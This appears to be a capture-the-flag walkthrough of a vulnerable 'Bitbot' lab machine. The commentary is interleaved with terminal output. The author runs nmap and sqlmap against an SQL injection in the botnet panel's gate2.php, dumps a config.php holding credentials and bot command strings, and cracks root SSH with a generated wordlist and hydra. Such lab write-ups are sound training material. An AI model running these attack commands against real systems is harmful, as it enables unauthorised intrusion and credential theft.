Bit-Bot challenge? Why not? Let's get's started!
Nmap scan report for 192.168.1.104OK, then
Host is up (0.00068s latency).
MAC Address: 00:0C:29:F8:B4:4E (VMware)
root@osboxes:~# nmap -sV -A 192.168.1.104Nice! Let's check rpcbind
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 13:32 GMT
Nmap scan report for 192.168.1.104
Host is up (0.00075s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
| 1024 e0:dc:be:e9:72:1b:c8:77:40:d2:38:2c:43:c9:b3:49 (DSA)
| 2048 88:e2:0c:77:06:bd:27:5a:14:06:58:c3:d5:41:21:f0 (RSA)
|_ 256 73:11:64:71:a6:c0:a3:f1:60:b5:cf:fa:78:42:5a:a0 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41291/udp status
|_ 100024 1 50153/tcp status
program version netid address service ownerNothing interesting :-) I hope that on port 80 will be sth useful.
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /var/run/rpcbind.sock portmapper superuser
100000 3 local /var/run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.161.75 status 102
100024 1 tcp 0.0.0.0.195.233 status 102
100024 1 udp6 ::.180.8 status 102
100024 1 tcp6 ::.187.192 status 102
But I clicked on the link and...
Grrrr.... So at least we know Apache version. Dirbuster again...
Ow yeah! admin.php looks great!
SQL Injection does not work on this panel :-( Let's examine source code. Unfortunately does not cotain any sensitive information. Maybe exist some exploit?
Bitbot C2 Panel gate2.php - Multiple VulnerabilitiesOK! From the exploit now, we know that hwid parameter in gate2.php is vulnerable to SQLi. So,
root@osboxes:~/bitbot# sqlmap -u "http://192.168.1.104/gate2.php?connection=0&hwid=1" -p hwid --level 5 --risk 3 --dbsWe are looking for some credentials...
available databases [6]:
[*] bitbot
[*] information_schema
[*] mysql
[*] performance_schema
[*] roottext
[*] test
Database: bitbotLet's try log in into BitBot with the credentials. Unfortunately it doesn't work.
Table: mining_configs
[2 entries]
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| botid | mode | pass | port | pool | proxy | params | user | threads |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| all | agr | worker password | port | poolurl | <blank> | -g yes | worker username | default |
| all | idle | worker password | port | poolurl | <blank> | -g no | worker username | default |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
We have retrieved source code of config.php via SQL Injection
<?phpWonderful! We have a lot of credentials (only two :P)! I am inside!
//Timezone
date_default_timezone_set('Europe/London'); // VISIT http://www.php.net/manual/en/timezones.php For list of timezones
//Admin Configs
$ADMIN_USER_NAME = 'botter'; //panel username
$ADMIN_PASSWORD = 'IF I CAME UP WITH UNIQUE PASSWORDS, I WOULD BE HOME BY NOW'; //panel password
//SQL Configs
$SQL_HOST = 'localhost'; //db host
$SQL_USER_NAME = 'root'; //db user
$SQL_PASSWORD = 'THIS PASSWORD WILL NOT HELP YOU'; //db pass
$SQL_DATABASE = 'bitbot'; //db name
$SQL_CONNECTION = @mysql_connect($SQL_HOST,$SQL_USER_NAME,$SQL_PASSWORD);
//Panel Configs
$BOT_PAGE_MAX = '50';
//Mining Configs
$JSONurl = ''; //follow readme
$apitoken = ''; //follow readme
$apihash = 'hashrate'; //follow readme
$crypto = 'btc'; //btc or ltc
////////////////Do Not Edit Beyond This Point///////////////////////////////////////////
$BOT_CHECKIN_INTERVAL = '60'; //seconds
$CMD_SPLIT = '<\\\\\>';
$CMD_DOWNLOAD = 'DOWN';
$CMD_UPDATE = 'UPDATE';
$CMD_VISIT_SITE = 'VISIT';
$CMD_REMOVE = 'REMOVE';
$CMD_DDOS_STOP = 'STOP';
$CMD_BTC = 'MINE';
$CMD_STOPBTC = 'STOPMINE';
?>
Interesting! But I didn't find fat chance to upload reverse shell. Let's try authenticate via the credentials by SSH.
Great! We have limited shell! Let's check what is bot.py from /index.php page.
botter@Bitbot:~$ cd /var/www/bot/We are allowed to read and write this file. Hmm I am too weak to do something useful from the file.
botter@Bitbot:/var/www/bot$ ls -la
total 12
drwxr--r-- 2 botter root 4096 Aug 21 2013 .
drwxr-xr-x 6 root root 4096 Aug 11 2013 ..
-rw-r--r-- 1 botter root 2418 Aug 11 2013 bot.py
Let's look, what we have in our /home directory
botter@Bitbot:~$ cat gen.shHm, we can read and understand bash code, Let's try
ifconfig eth0 | grep inet | grep -v inet6 | awk '{print $2substr(rand(),0,5);}' | awk '{print $0"\n"$0}' | passwd
root@osboxes:~/bitbot# python -c 'for i in range(100): print "addr:192.168.1.1040."+str(i)' > passwd.txtGreat! We are a heroes!
root@osboxes:~/bitbot# hydra -l root -P passwd.txt ssh://192.168.1.104 -f -e nsr
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-04 15:13:27
[DATA] 16 tasks, 1 server, 103 login tries (l:1/p:103), ~6 tries per task
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host: 192.168.1.104 login: root password: addr:192.168.1.1040.54
[STATUS] attack finished for 192.168.1.104 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Game over!
